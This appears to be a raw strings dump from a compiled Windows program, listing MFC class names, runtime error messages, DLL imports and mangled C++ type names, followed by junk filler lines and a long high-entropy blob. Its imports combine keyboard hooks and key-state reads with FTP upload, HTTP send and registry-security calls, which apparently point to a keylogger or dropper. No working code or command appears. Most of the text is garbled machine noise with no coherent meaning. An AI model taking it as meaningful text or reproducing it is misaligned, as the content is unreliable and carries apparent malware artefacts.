CMDIChildWndEx
CMDIFrameWndEx
CMDIFrameWndEx
CMDIChildWnd
CMDIChildWnd
CMDIFrameWnd
CMDIFrameWnd
CMDIClientAreaWnd
CMDIClientAreaWnd
CHotKeyCtrl
CHotKeyCtrl
CMFCToolBarsKeyboardPropertyPage
CMFCToolBarsKeyboardPropertyPage
GetProcessWindowStation
GetProcessWindowStation
operator
operator
portuguese-brazilian
portuguese-brazilian
qR.Rd
qR.Rd
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
%%X
%%X
RegSetKeySecurity error! (rc=%lu)
RegSetKeySecurity error! (rc=%lu)
Key not found.
Key not found.
Error opening key.
Error opening key.
ntdll.dll
ntdll.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
LookupPrivilegeValue error: %u
LookupPrivilegeValue error: %u
twrejsg$45567;;;;%%%%564&&&yghjfghjfghjffgfdgdfg.,df.g,dhgdfhgfhdf...fhg.h.dfg.sd,fg.sg,f.sd,hrthrthrthdfgh56456456jhtr56uy56u56u56u56tgiuergiuerhgpuherguherguherguetrguhertoueugh
twrejsg$45567;;;;%%%%564&&&yghjfghjfghjffgfdgdfg.,df.g,dhgdfhgfhdf...fhg.h.dfg.sd,fg.sg,f.sd,hrthrthrthdfgh56456456jhtr56uy56u56u56u56tgiuergiuerhgpuherguherguherguetrguhertoueugh
ertyr56u56u56adfhafdsfghggfdsgaafsdasdfsfasadsgasdgsgdfa5634453.dfgsd.&&%//(/&)($&/&$/fg,d.fg,sfa4564564563456356fthrthrthrthrfthrt5656u6ethyrthjrthjrethjrthjerthjertjherthjrthjtrhjrthj
ertyr56u56u56adfhafdsfghggfdsgaafsdasdfsfasadsgasdgsgdfa5634453.dfgsd.&&%//(/&)($&/&$/fg,d.fg,sfa4564564563456356fthrthrthrthrfthrt5656u6ethyrthjrthjrethjrthjerthjertjherthjrthjtrhjrthj
Error %d: Could not begin update of %s
Error %d: Could not begin update of %s
Error %d: Updating resource
Error %d: Updating resource
!"#$%&'()* ,-./:;?@[\]^_`{|}~
!"#$%&'()* ,-./:;?@[\]^_`{|}~
C:\appbuilder_2.0_multiinstall\Release\temp.pdb
C:\appbuilder_2.0_multiinstall\Release\temp.pdb
IPHLPAPI.DLL
IPHLPAPI.DLL
PSAPI.DLL
PSAPI.DLL
GetProcessHeap
GetProcessHeap
GetWindowsDirectoryW
GetWindowsDirectoryW
GetCPInfo
GetCPInfo
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
SetWindowsHookExW
SetWindowsHookExW
CreateDialogIndirectParamW
CreateDialogIndirectParamW
UnhookWindowsHookEx
UnhookWindowsHookEx
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjectsEx
GetAsyncKeyState
GetAsyncKeyState
MapVirtualKeyW
MapVirtualKeyW
GetKeyboardLayout
GetKeyboardLayout
GetKeyboardState
GetKeyboardState
GetKeyNameTextW
GetKeyNameTextW
MapVirtualKeyExW
MapVirtualKeyExW
EnumChildWindows
EnumChildWindows
USER32.dll
USER32.dll
GetViewportExtEx
GetViewportExtEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
MSIMG32.dll
MSIMG32.dll
COMDLG32.dll
COMDLG32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegLoadKeyW
RegLoadKeyW
RegUnLoadKeyW
RegUnLoadKeyW
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegSetKeySecurity
RegSetKeySecurity
RegDeleteKeyW
RegDeleteKeyW
RegEnumKeyExW
RegEnumKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyW
RegEnumKeyW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
UrlUnescapeW
UrlUnescapeW
SHLWAPI.dll
SHLWAPI.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
oledlg.dll
oledlg.dll
OLEACC.dll
OLEACC.dll
InternetCrackUrlW
InternetCrackUrlW
HttpOpenRequestW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestW
HttpQueryInfoW
HttpQueryInfoW
InternetCanonicalizeUrlW
InternetCanonicalizeUrlW
FtpDeleteFileW
FtpDeleteFileW
FtpRenameFileW
FtpRenameFileW
FtpCreateDirectoryW
FtpCreateDirectoryW
FtpRemoveDirectoryW
FtpRemoveDirectoryW
FtpSetCurrentDirectoryW
FtpSetCurrentDirectoryW
FtpGetCurrentDirectoryW
FtpGetCurrentDirectoryW
FtpPutFileW
FtpPutFileW
FtpGetFileW
FtpGetFileW
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpEndRequestW
HttpEndRequestW
HttpSendRequestExW
HttpSendRequestExW
FtpOpenFileW
FtpOpenFileW
FtpCommandW
FtpCommandW
FtpFindFirstFileW
FtpFindFirstFileW
InternetOpenUrlW
InternetOpenUrlW
WININET.dll
WININET.dll
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
IMM32.dll
IMM32.dll
WINMM.dll
WINMM.dll
.PAVCOleException@@
.PAVCOleException@@
.PAVCException@@
.PAVCException@@
.PAVCObject@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCResourceException@@
.?AVCFtpFileFind@@
.?AVCFtpFileFind@@
.?AVCFtpConnection@@
.?AVCFtpConnection@@
.?AVCHttpConnection@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.?AVCHttpFile@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0EA@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0EA@@ATL@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AVCToolCmdUI@@
.?AVCToolCmdUI@@
.?AVCMDITabProxyWnd@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMDIFrameWnd@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCToolBarCmdUI@@
.?AVCKeyboardManager@@
.?AVCKeyboardManager@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonCmdUI@@
.?AV?$CArray@PAVCMFCRibbonKeyTip@@PAV1@@@
.?AV?$CArray@PAVCMFCRibbonKeyTip@@PAV1@@@
.?AVCMFCWindowsManagerDialog@@
.?AVCMFCWindowsManagerDialog@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAUHMENU__@@PAU3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAUHMENU__@@PAU3@@@
.?AVCMFCCmdUsageCount@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AVCMFCColorBarCmdUI@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AVCMFCStatusBarCmdUI@@
.?AVCMFCStatusBarCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCAcceleratorKey@@
.?AVCHotKeyCtrl@@
.?AVCHotKeyCtrl@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCRibbonKeyTip@@
.?AVCOleCmdUI@@
.?AVCOleCmdUI@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCRibbonKeyboardCustomizeDialog@@
.?AVCMFCRibbonKeyboardCustomizeDialog@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÃ
zcÃ
.?AV?$CArray@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@ABV12@@@
.?AV?$CArray@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@ABV12@@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.PAVCFileException@@
.PAVCFileException@@
.PAVCInternetException@@
.PAVCInternetException@@
X6CCA4ttNnppZYNNMIllZ*xxi/ggHkRRq`wwm\tt8LttBbnnBupppQNNvcXXc4eeEOCCe"005`nnHy00y:ggvcxxJ6oop5VVJ8nnK$nnNOjjw9663"nnH6LLNMuuc$ddp.lldjbb1JSS3}66xqoopJddp|xxJSS2SLLWpuuwLFFAunnJqNNrvmmBgxxh'uuv gg6]ww3xxxdEvvKQnnw[SSJV33mbttcnXXP^XX1G33c?QQx qqZQjjHCNNB!nnsNllO'llA"ooEMuuw_VV6/pp4=xxg*wwx%qqM$QQKdFFZ>WWN|xxCEoozddisvvNVxxq SSHuRRt"ooHf66C|xxxTNNKzWWG9nne(uuZwggBpCCx?dd4VWWf800v0nnv|115moo3$jjTRSSpvllyYQQwVnnzMjjHVjjl{kkzyVVTPQQ15nnr9mmNxVVmimmz%XX2tWWfDee6ÌGuqqxQvvJujjqllHzXXMuppH2996_QQN4qqz4bbN#ddBTmmw-xxfcvvJ%RRk#xxsMLLyuQQ2u99VwuuGittV@nnGyVV5»wXqq84vvvtLLq xxvmHHJWkkewjjyHCCfYjjn3bbNallu;hhJX00MOWWf.XXU]jjf1VV5@XXfHxxi1wwvX00tBXX2(xxwjww2:jjx9xxeKNNB}kksBnncjmmN5ddO!ggwqgg8sbbNBllR'CCHaRRNiXXv_llWfttp;FFRZvveo66O^XXJREEPCggzgXXO%nnG)XXZEjjfoxx2bSSwALLlGCCcLLLh4nnd\VVw,uu4(gginttw"332XWW2~nno/llxiMMZYWWsQllzeggrJoo4|CCd>qqxynnw(LLR?llZ6XXMcXXNr664yQQK?ggqfllN`ooH/llw;00jGQQKAnn3qSSz1XXf nnerjj5awwZ1bb3IxxrcwwAObbKtjjB2oopoXXs#XXmSllrYXXv,llsjnnw*llRXggr`XXZaxxJ%NNepCCNJ55A|ppK@LLh'vvJ?nnlWkkmOllc|nnd&qqJejjHijj8jggc)ddU%kkw266ZVSSehnnvqoofWEE3FQQp,NNr'nnvOdd3Puue4LLCfxxdBXXOsbbcZSSV0kkf\bb5muuxcll16CCK?xxBUood`xx3nbbpLNNU.vvHx33B3CCxqVVNrSSf#MM2}vvKxnnBDQQpsll1JppdDHH4>jjKgNNe$llA=xxq!CCw>bbPEppwt33r%ppH533PxbbHSNNE/CCrVaa5*CCdnXXsDmmN_ll4@XXx=nnxSxxZMttJ_SSJ?nnEquuz9jj8[wwG^ddKjuuJ)uuAGvvK}xx3^xxG=NNiFppr5xxh_jjJKNNH1jjdBXXZLggvA00EEnnKWXXi"bbGINNr?nnAuxxn)mmZvddC@wwNinnOmuu2JjjtCnnvi00ezWWf~33vwxx1P66cwuuH%qqk bbxFbb35nnv.VVeNCCsHllp}kkwWddUnmms]llh6vvBMLLh1mmw500M~bbZsbbZ$XXp3NNjiSSJ8LLiqbbcJnnq4jjmbLLh'kkx8VVM@xx3mwwBqyysRggd{nnwXXXJ#jjfy666^WWJBVVC`QQNFSSBvkkBxggR(QQKAjjV}bbxBqqb,llwFggeBCCrgqqB{uuJXxxr{XXeU33fsjjwFjjn>ppw'lls{oocXXXa}wwx}ooAHllH1LLb-jje`nn2?jjJtooA$ww17338*nnKpNNLtnnw/RRsfuuc]XXP/bb4Ltt5{xx2njjoAkke*dd4LllHhll3\llG?XXEDnnrNNNpjwwZ4xx5(oo2aLLvtwwG VVEdmmJ{FFEkllwMddoCppB~ooE!XXp0llq\mmJNddg0ggfVllG/QQs=nnR$mm4NNNVottv,00mcvvJOjjU=WW2&uu4KCCNQjjtquu1CLLp:ooc>qqp;SSzOjjW^vvf~xxU.xxcmqqktuuJ NN3rvvJ69912SSppXXH.XXeCUUH9SSxGnne6jjftLLtZkksXllz/xxe 992nuuJ\xx2ChhN4llc2XXe*xxTYSSelddm~ggve00e0vvff00YWXX2&IIo$XXwSRRbzCCc*NNkcpp3{ggnToo1$66l1XX2'33Z:uuGUddg|uurBNNd4ggdWFF2CvvcWXXPDQQf?ee43SSv'66mPnne&RRz;ppz)SSPfppvT55ZbCCd^ddi>mme$IIe:oo1ellvrbbK/XXlcWWeAqqHggdNllG9wwvHLLAmooJ*XXY4XXH$LLTMuu1KFF2>XXr,ggPDppx{ll1-llw]66K:ooc*LLKymmd/jjOLnnJ.nn8,XXHVjjt_mmeE33eQjjrFLLOkvvf"RRrHllv=NNrpxxwGggb-ooxwVVxFpp4znnt8xxBqLLR@WWsIllC`XXxz55Z%WWN~SSR$ggpgll4RmmN ddm5bb4Wjjb4ooeMddoukketnnsOggfhjj1gWWZtee3eSSmpoo5Allcslll`nnJtttZKvvfHNNV:xxf6HH6gCCfSttZuuuH1MMZ~QQw&xxWIjjf^ggMnSSe"RRmFnn1/993pjjx)LLV nnr>NN3Sxxc!MM4Pvvv^wwA\vvckMMH#wwrklldqmm3ueeEZmmGSoo3@WWwQLLTtjje?qqw.nne`llW2ooZeXXT*WWG^qqc#llGlVVT?SSwKLLoGmmGVllt&mm1mLLZ CCd4VVV%QQNEVVCFwwceggdkvvx666HiQQZ{NNh`oop^ll6$WWNtXXK|XXKsddaAnnZ_lluUbbxfuuR6uu2fggy!kkfdbbPLnnckXXw}QQzHlljzggx}ddAvggH!oo6!wwd_VVBUwwfqSS4?oomxllV2XXf=33ZZttx%jjdJCCpEnn11SSvALLy*ggzqNNRxvvzxddwYood'xxYDvvHFnnvyooJ?NNa-QQw800M0CCpaVVqrXX4TnndkXXwnjjMpWWGfooA9QQ2`ddhYkkcpVVbcxx4FXXO[SSGYooRyXXwWggvjSSfGggr/kkm~eeH_vvs,ll3|QQK$NNcEoo19jjwpwwruqqZ=hhH9xxk^wwpBHHA\QQ17RRU@ppHJIIbOttB#EEB7xx2dVVx2kkmfbbH6WWr-jjuVggKBddrqqv`mmJhUUEAnndYqqGEXXxxjjrmjjfKRR6@xxev00Jzuu2 VVa`XXftxxl#CCBNMMV5jjG9llBUjjvnxxzKCCJ.llA jjKmdd6Tnn4vXXt_CCJnMM1*nnxBddGUjjf81129jjcennfkbbJ_ggUyppx*qqg ccGPqqi=pp1OIIg xxzXqq1.jj2MggqHccH266B_jjp=XXrAjj1J66R~uur)ddsahhG@llEinneH66PMhhK}llZgWW3[LL2ZjjJ!66LVttwAllHRggfl00r%QQKdjjz*mm1[FFPvXXrkFFPmQQwnn28ttE$llp{ee3qvvvRll34ppJm33t)SSvN551KjjwzqqI[QQdvSSA}nnJnUU3/vvB|ddr)mm2fNNl{mm18jjRivvs\ooNwjje.00i%QQdUxxr`ppeLLLw"nncKqqJnCCfdxxWUggr$ddLuwwm@dd1 xxKKSSR;SSw6aa5euux`LLO|vvdwggg'wws8eePmWWrauuVruuHgVVURnnvqNNn.bbBKLLaPhhN466Lquuxfaa50ggw\wwNbbbw]IIe7CCw7NN2Zmm3.LLdUoo16IIBeSSrXdd4vQQzmww1pkkfaddr{CCJIIInauuGJllhdwwdGFF4Lpp1eEEE~jjK9aaEYwwmUllszuudWLLeZoowV002QWWrpddUJSSH*qqh"vvHdxxlVpp4zxxp WWx&MM2=vvK_LLUzWWKnddY8jjfQUU58vvdrNNd>mm1HVVp!mm2IVVC2nnc gg4kuuJpMMV7uuxjNNOJnn10LLAVnnx&VVP7ppvJ55Eljj4~VV8wppw*qqG~uuJuEE3-pp3VjjJoWWG*qqp uu11RRi#jj41ggYDxxd-eeRMWWH0xxzUccNfaaB3yysFggn'uuZYggB9SSvZggT7mmN,XXn3WWc7NNOKuuH[VVeBwwxeqqZ7jjrRHHBmkkBWW3%llpMWWG&ggR"nne,oo2sQQdkooRfggH]992#uu1\33c-QQpsNNOZmm4AnnmYvvBqnn5FggdR66Hfll3allYwvve0uu4dnnzwFFNHwwKOLLR#uuw-33cooo1-nnxvQQ3hLLidccKzLLirmmp